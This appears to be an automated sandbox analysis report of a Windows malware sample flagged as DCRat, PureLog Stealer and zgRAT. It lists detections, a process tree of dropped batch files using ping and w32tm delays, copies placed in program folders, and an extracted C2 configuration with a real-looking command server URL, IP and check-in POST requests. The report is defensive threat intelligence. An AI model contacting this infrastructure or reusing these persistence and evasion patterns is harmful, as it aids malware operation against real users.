Edit tour

Windows Analysis Report
yQrCGtNgsf.exe

Overview

General Information

Sample name:	yQrCGtNgsf.exe renamed because original name is a hash value
Original sample name:	330a09824e901f7c2fb65be086df1493.exe
Analysis ID:	1521033
MD5:	330a09824e901f7c2fb65be086df1493
SHA1:	236a6a080f1ea340343bedab226a88b3b92ea9cf
SHA256:	6c43c7e744ec4c55bec5fa9156561d81015db4cb2574c39648a5f5efc69943fa
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Drops executable to a common third party application directory

Machine Learning detection for dropped file

Machine Learning detection for sample

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

yQrCGtNgsf.exe (PID: 7588 cmdline: "C:\Users\user\Desktop\yQrCGtNgsf.exe" MD5: 330A09824E901F7C2FB65BE086DF1493)

cmd.exe (PID: 7788 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9eKXf9oU9J.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7848 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7864 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

JPOyDhPFIytu.exe (PID: 7920 cmdline: "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe" MD5: 330A09824E901F7C2FB65BE086DF1493)

cmd.exe (PID: 8068 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\77a9gOcAJB.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 8132 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 8148 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

JPOyDhPFIytu.exe (PID: 1384 cmdline: "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe" MD5: 330A09824E901F7C2FB65BE086DF1493)

cmd.exe (PID: 4132 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 4136 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 2848 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

JPOyDhPFIytu.exe (PID: 2616 cmdline: "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe" MD5: 330A09824E901F7C2FB65BE086DF1493)

cmd.exe (PID: 5784 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6C8kMSA4ag.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6680 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 4648 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

JPOyDhPFIytu.exe (PID: 5760 cmdline: "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe" MD5: 330A09824E901F7C2FB65BE086DF1493)

cmd.exe (PID: 7480 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\mzBmoeLRKc.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 4932 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 5040 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

JPOyDhPFIytu.exe (PID: 7580 cmdline: "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe" MD5: 330A09824E901F7C2FB65BE086DF1493)

cmd.exe (PID: 7756 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\F0qtrCuOKA.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7768 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7596 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

JPOyDhPFIytu.exe (PID: 7780 cmdline: "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe" MD5: 330A09824E901F7C2FB65BE086DF1493)

cmd.exe (PID: 7760 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uw07fWAZe6.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7788 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7796 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

JPOyDhPFIytu.exe (PID: 5592 cmdline: "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe" MD5: 330A09824E901F7C2FB65BE086DF1493)

cmd.exe (PID: 6780 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9VsmEYMPZS.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 8140 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7120 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

JPOyDhPFIytu.exe (PID: 7924 cmdline: "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe" MD5: 330A09824E901F7C2FB65BE086DF1493)

cmd.exe (PID: 8128 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\mpHYiEZ4vY.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 8020 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7204 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

JPOyDhPFIytu.exe (PID: 7360 cmdline: "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe" MD5: 330A09824E901F7C2FB65BE086DF1493)

cmd.exe (PID: 4424 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3904 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 6652 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://115583cm.n9shteam2.top/vmTo_authDbbaseTesttrackDatalifedownloads", "MUTEX": "DCR_MUTEX-RxLHfqluj2OpsLVcTfkV", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
yQrCGtNgsf.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
yQrCGtNgsf.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1437836517.0000000000272000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1535361216.00000000128EA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: yQrCGtNgsf.exe PID: 7588	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: JPOyDhPFIytu.exe PID: 7920	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.yQrCGtNgsf.exe.270000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.yQrCGtNgsf.exe.270000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T03:22:24.935813+0200	2048095	1	A Network Trojan was detected	192.168.2.8	49710	37.44.238.250	80	TCP
2024-09-28T03:22:37.732694+0200	2048095	1	A Network Trojan was detected	192.168.2.8	49713	37.44.238.250	80	TCP
2024-09-28T03:22:46.107744+0200	2048095	1	A Network Trojan was detected	192.168.2.8	49714	37.44.238.250	80	TCP
2024-09-28T03:22:58.560918+0200	2048095	1	A Network Trojan was detected	192.168.2.8	49715	37.44.238.250	80	TCP
2024-09-28T03:23:06.389074+0200	2048095	1	A Network Trojan was detected	192.168.2.8	49717	37.44.238.250	80	TCP
2024-09-28T03:23:14.982976+0200	2048095	1	A Network Trojan was detected	192.168.2.8	49718	37.44.238.250	80	TCP
2024-09-28T03:23:22.654698+0200	2048095	1	A Network Trojan was detected	192.168.2.8	49719	37.44.238.250	80	TCP
2024-09-28T03:23:51.088999+0200	2048095	1	A Network Trojan was detected	192.168.2.8	49722	37.44.238.250	80	TCP
2024-09-28T03:24:13.014173+0200	2048095	1	A Network Trojan was detected	192.168.2.8	49723	37.44.238.250	80	TCP
2024-09-28T03:24:21.107865+0200	2048095	1	A Network Trojan was detected	192.168.2.8	49724	37.44.238.250	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: yQrCGtNgsf.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\6C8kMSA4ag.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\GJcAmyRG.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\9VsmEYMPZS.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\uw07fWAZe6.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\mpHYiEZ4vY.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\9eKXf9oU9J.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\mzBmoeLRKc.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\F0qtrCuOKA.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\NkPigQpK.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\FTTrxXjd.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\KRjbfmWU.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\77a9gOcAJB.bat	Avira: detection malicious, Label: BAT/Delbat.C

Found malware configuration

Source: 00000000.00000002.1535361216.00000000128EA000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://115583cm.n9shteam2.top/vmTo_authDbbaseTesttrackDatalifedownloads", "MUTEX": "DCR_MUTEX-RxLHfqluj2OpsLVcTfkV", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for domain / URL

Source: 115583cm.n9shteam2.top	Virustotal: Detection: 13%	Perma Link
Source: http://115583cm.n9shteam2.top	Virustotal: Detection: 13%	Perma Link
Source: http://115583cm.n9shteam2.top/	Virustotal: Detection: 13%	Perma Link
Source: http://115583cm.n9shteam2.top/vmTo_authDbbaseTesttrackDatalifedownloads.php	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Virustotal: Detection: 61%	Perma Link
Source: C:\Program Files\Adobe\Acrobat DC\JPOyDhPFIytu.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files\Adobe\Acrobat DC\JPOyDhPFIytu.exe	Virustotal: Detection: 61%	Perma Link
Source: C:\Program Files\Uninstall Information\JPOyDhPFIytu.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files\Uninstall Information\JPOyDhPFIytu.exe	Virustotal: Detection: 61%	Perma Link
Source: C:\Recovery\JPOyDhPFIytu.exe	ReversingLabs: Detection: 73%
Source: C:\Recovery\JPOyDhPFIytu.exe	Virustotal: Detection: 61%	Perma Link
Source: C:\Users\user\Desktop\BDesMBdT.log	Virustotal: Detection: 10%	Perma Link
Source: C:\Users\user\Desktop\FTTrxXjd.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\FTTrxXjd.log	Virustotal: Detection: 69%	Perma Link
Source: C:\Users\user\Desktop\GJcAmyRG.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\GJcAmyRG.log	Virustotal: Detection: 69%	Perma Link
Source: C:\Users\user\Desktop\HPxsKDSZ.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\HPxsKDSZ.log	Virustotal: Detection: 28%	Perma Link
Source: C:\Users\user\Desktop\IjLZavdG.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\IjLZavdG.log	Virustotal: Detection: 28%	Perma Link
Source: C:\Users\user\Desktop\KRjbfmWU.log	Virustotal: Detection: 40%	Perma Link
Source: C:\Users\user\Desktop\KZthgyKJ.log	Virustotal: Detection: 10%	Perma Link
Source: C:\Users\user\Desktop\LCrhcYww.log	Virustotal: Detection: 10%	Perma Link
Source: C:\Users\user\Desktop\MAAYLQkP.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\MAAYLQkP.log	Virustotal: Detection: 28%	Perma Link
Source: C:\Users\user\Desktop\NkPigQpK.log	Virustotal: Detection: 40%	Perma Link
Source: C:\Users\user\Desktop\OzAXPueG.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\OzAXPueG.log	Virustotal: Detection: 28%	Perma Link
Source: C:\Users\user\Desktop\RdNoqiHi.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\RdNoqiHi.log	Virustotal: Detection: 28%	Perma Link
Source: C:\Users\user\Desktop\RfcHRSFf.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\RfcHRSFf.log	Virustotal: Detection: 28%	Perma Link
Source: C:\Users\user\Desktop\SKvXgoIi.log	Virustotal: Detection: 40%	Perma Link
Source: C:\Users\user\Desktop\TADrPPcC.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\TADrPPcC.log	Virustotal: Detection: 69%	Perma Link
Source: C:\Users\user\Desktop\TLlpvaAw.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\TLlpvaAw.log	Virustotal: Detection: 28%	Perma Link
Source: C:\Users\user\Desktop\TzzXjEkC.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\TzzXjEkC.log	Virustotal: Detection: 28%	Perma Link
Source: C:\Users\user\Desktop\UkLxLBCd.log	Virustotal: Detection: 40%	Perma Link

Multi AV Scanner detection for submitted file

Source: yQrCGtNgsf.exe	ReversingLabs: Detection: 73%
Source: yQrCGtNgsf.exe	Virustotal: Detection: 61%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BDesMBdT.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GJcAmyRG.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\LCrhcYww.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\KZthgyKJ.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\FTTrxXjd.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: yQrCGtNgsf.exe

Joe Sandbox ML: detected

Source: yQrCGtNgsf.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Directory created: C:\Program Files\Uninstall Information\JPOyDhPFIytu.exe	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Directory created: C:\Program Files\Uninstall Information\599871f56ea49f	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\JPOyDhPFIytu.exe	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\599871f56ea49f	Jump to behavior

Source: yQrCGtNgsf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: JPOyDhPFIytu.exe, 00000007.00000002.1625194309.000000001AFD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.pdbX7@ source: JPOyDhPFIytu.exe, 0000000D.00000002.1763080386.000000001B4BC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.pdb source: JPOyDhPFIytu.exe, 0000001E.00000002.2066031775.000000001BB0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: t\JPOyDhPFIytu.PDBd source: JPOyDhPFIytu.exe, 00000007.00000002.1625194309.000000001AFD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: JPOyDhPFIytu.exe, 0000001E.00000002.2066031775.000000001BB21000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 0. C089IL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb7 source: JPOyDhPFIytu.exe, 00000007.00000002.1625194309.000000001AFD0000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.8:49722 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.8:49710 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.8:49714 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.8:49717 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.8:49715 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.8:49724 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.8:49718 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.8:49719 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.8:49723 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.8:49713 -> 37.44.238.250:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

IP Address: 37.44.238.250 37.44.238.250

Source: Joe Sandbox View

ASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR

Source: global traffic	HTTP traffic detected: POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 115583cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 115583cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /vmTo_authDbbaseTesttrackDatalifedownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 115583cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
